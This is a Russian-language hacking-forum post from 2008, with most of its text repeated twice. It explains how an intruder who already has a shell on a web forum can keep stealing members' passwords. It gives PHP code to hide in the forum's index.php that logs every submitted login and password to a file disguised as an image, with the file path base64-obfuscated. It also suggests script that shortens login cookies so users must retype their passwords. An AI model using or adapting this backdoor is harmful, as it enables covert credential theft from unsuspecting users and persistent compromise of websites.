n-000
29.04.2008, 01:44
Хочу рассказать о том , как можно узнать пассы юзверей форума, предварительно залив на него шелл, даже если ваш шелл найдуд и захреначат, то у вас будет шанс подсмотреть пасс админа ... если ваш троянец останется в скриптах форума !
Ну скажем вы нашли хэш админа -) расшифровали и залили шелл ) ну а как узнать пасы остальных ? брутить !
Да ну нах ) можно же всё зделать проще ) Пусть юзвери сами пришлют вам свой пасс ) Как ?
Естесно впихнуть небольшого троянца, который будет пасти ввод логина и пасса в поля и сохранять их на том же серваке где и форум...
ПАЛЕВО !!!! скажите -)
Да нет -)
Идём в ../forum/Themes/default/images создаём там файлик dot.gif дальше пляшем от него -)
Итак, есть файлик и в него будем сейвить пасы )
Не будем мазать сопли по тарелке и переходим непосредственно к скрипту ...
$patch_ = getcwd().base64_decode('L1RoZW1lcy9kZWZhdWx0L2ltYW dlcy9kb3QuZ2lm');
$patch_ = str_replace("\\","/",$patch_);
if(isset($_POST['user']) != '' && isset($_POST['passwrd']) != '')
{
$f_l = fopen($patch_,'a+');
fwrite($f_l,$_POST['user'].' : '.$_POST['passwrd']."\n");
fclose($f_l);
}
этот скрипт мы прячем вподальше в index.php самого форума, ну например около 63 строки ... которая начинается с коментария ( // Connect to the MySQL database. )
После него вставляем сам скрипт !
Думаю если у вас хватило прыти залить шелл, то понять то, что зашифровано в base64 для вас загадкой не будет.
Ну а теперь у вас есть троянец который будет записывать в /forum/Themes/default/images/dot.gif все пассы которые вводят юзвери в соответствующие поля !
Можно у себя на серваке зделать парсер данного файла и просматривать пассы как угодно, по алфавиту или по дате добавления -) как вам угодно ))
А что если юзверь авторизуется через куки и пасс вообще не вводит ?
Да это трабла ) ведь тогда наш троянец бездействует и не ловит таких засранцев )
Но и на таких есть управа -)
Можно создать жабаскрипт который перепишет куки юзверю, скажем не на постоянный логин, а на пару часов! И после того как ламера лягут спать их куки удаляца, ну и конечно их попросит форум ввести пасс снова, ну а дальше вы сами всё знаете...
Удачи вам в вашем нелёгком, но я думаю правильном направлении !
Ну скажем вы нашли хэш админа -) расшифровали и залили шелл ) ну а как узнать пасы остальных ? брутить !
Да ну нах ) можно же всё зделать проще ) Пусть юзвери сами пришлют вам свой пасс ) Как ?
Естесно впихнуть небольшого троянца, который будет пасти ввод логина и пасса в поля и сохранять их на том же серваке где и форум...
ПАЛЕВО !!!! скажите -)
Да нет -)
Идём в ../forum/Themes/default/images создаём там файлик dot.gif дальше пляшем от него -)
Итак, есть файлик и в него будем сейвить пасы )
Не будем мазать сопли по тарелке и переходим непосредственно к скрипту ...
$patch_ = getcwd().base64_decode('L1RoZW1lcy9kZWZhdWx0L2ltYW dlcy9kb3QuZ2lm');
$patch_ = str_replace("\\","/",$patch_);
if(isset($_POST['user']) != '' && isset($_POST['passwrd']) != '')
{
$f_l = fopen($patch_,'a+');
fwrite($f_l,$_POST['user'].' : '.$_POST['passwrd']."\n");
fclose($f_l);
}
этот скрипт мы прячем вподальше в index.php самого форума, ну например около 63 строки ... которая начинается с коментария ( // Connect to the MySQL database. )
После него вставляем сам скрипт !
Думаю если у вас хватило прыти залить шелл, то понять то, что зашифровано в base64 для вас загадкой не будет.
Ну а теперь у вас есть троянец который будет записывать в /forum/Themes/default/images/dot.gif все пассы которые вводят юзвери в соответствующие поля !
Можно у себя на серваке зделать парсер данного файла и просматривать пассы как угодно, по алфавиту или по дате добавления -) как вам угодно ))
А что если юзверь авторизуется через куки и пасс вообще не вводит ?
Да это трабла ) ведь тогда наш троянец бездействует и не ловит таких засранцев )
Но и на таких есть управа -)
Можно создать жабаскрипт который перепишет куки юзверю, скажем не на постоянный логин, а на пару часов! И после того как ламера лягут спать их куки удаляца, ну и конечно их попросит форум ввести пасс снова, ну а дальше вы сами всё знаете...
Удачи вам в вашем нелёгком, но я думаю правильном направлении !